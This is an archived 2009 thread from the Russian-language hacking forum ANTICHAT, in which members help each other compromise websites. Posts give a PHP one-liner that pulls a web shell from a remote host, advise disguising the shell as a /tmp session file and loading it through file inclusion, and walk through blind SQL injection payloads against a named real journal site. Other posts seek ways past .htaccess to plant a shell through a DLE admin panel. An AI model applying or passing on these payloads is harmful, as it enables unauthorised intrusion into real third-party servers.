ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.08.2009, 20:58
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
это timestamp, запоминай время заливки файла переводи в unixtime и напиши брутер который который этот timestamp подберет, только вот из-за .htaccess наверное ничего не выйдет с шеллом
Насколько я знаю, шестизначный timestamp был еще в 1970 году.
А сейчас десять знаков в timestamp'e.
|
|
|

12.08.2009, 21:08
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
По крайней мере в 6-ой ветке был именно timestamp в качестве префикса
__________________
Карфаген должен быть разрушен...
|
|
|

13.08.2009, 03:31
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме: 393885
Репутация:
34
|
|
вобщем могу выполнять команды через php include+логи,как можно залить норм шелл?
<?php include("http://site/nstview.txt"); ?> не прокатило,wget curla нету(смотрел в /bin/)
если в reffer вставить норм шелл,прокатит?
_____
Попробовал через reffer не получилось.Все залил там был wget,лежал не в bin
Последний раз редактировалось RazyKK; 13.08.2009 в 04:13..
|
|
|

13.08.2009, 05:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
<?php copy('http://site.gov/shell.txt', 'shell.php');?>
|
|
|

13.08.2009, 08:44
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме: 110312
Репутация:
50
|
|
А в какой каталог он скопирует файл? Может надо полный путь указать?
|
|
|

13.08.2009, 09:03
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме: 1168802
Репутация:
298
|
|
скопирует в текущий каталог
если хотите в другое место, можно использовать абсолютный путь который начинается с "/"
ну или относительный "../../dir1/shell"
|
|
|

13.08.2009, 09:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме: 7144817
Репутация:
1503
|
|
Проще тогда скопировать в /tmp/sess_26ac3fa833f07595698de0e73b8fa113.
Есть несколько плюсов:
1) 99% есть права на запись в диру
2) меньше палева, файл маскируется под сессию, и сидит там молча. =)
Потом инклудишь его index.php?page=/tmp/sess_26ac3fa833f07595698de0e73b8fa113
а потом уже перезаливаешь нормальный куда тебе нравится.
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|

13.08.2009, 13:57
|
|
Новичок
Регистрация: 13.08.2009
Сообщений: 2
Провел на форуме: 2194
Репутация:
0
|
|
http://www.inderscience.com/browse/index.php?journalID=114'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
что можно сделать? надеюсь я не ошибся темой) 
|
|
|

13.08.2009, 14:25
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме: 1174919
Репутация:
229
|
|
Сообщение от fast_start
http://www.inderscience.com/browse/index.php?journalID=114'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
что можно сделать? надеюсь я не ошибся темой) 
Крутить как слепую...
Например http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=100,1,0)-- выдает ошибку, значит наш ascii символ меньше...
пробуем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=50,1,0)-- ошибки нет, значит символ больше, http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=52,1,0)-- максимальное значение на котором не выдает ошибку, проверяем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))=52,1,0)-- ошибки нет, верно.
Т.е. первый ascii символ равен 52, значит версия мускуля 4-я.
Подробнее https://forum.antichat.ru/showpost.php?p=407227&postcount=3
|
|
|

13.08.2009, 15:55
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме: 170968
Репутация:
10
|
|
Есть доступ к dle админке, версия 7.3.
Включил возможность добавлять файлы, но к новости так прикрепить и не смог.
Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:
PHP код:
<FilesMatch ".*">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
Order deny,allow
Allow from all
</FilesMatch>
Какие есть способы залить шел?
Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?
Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач. 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|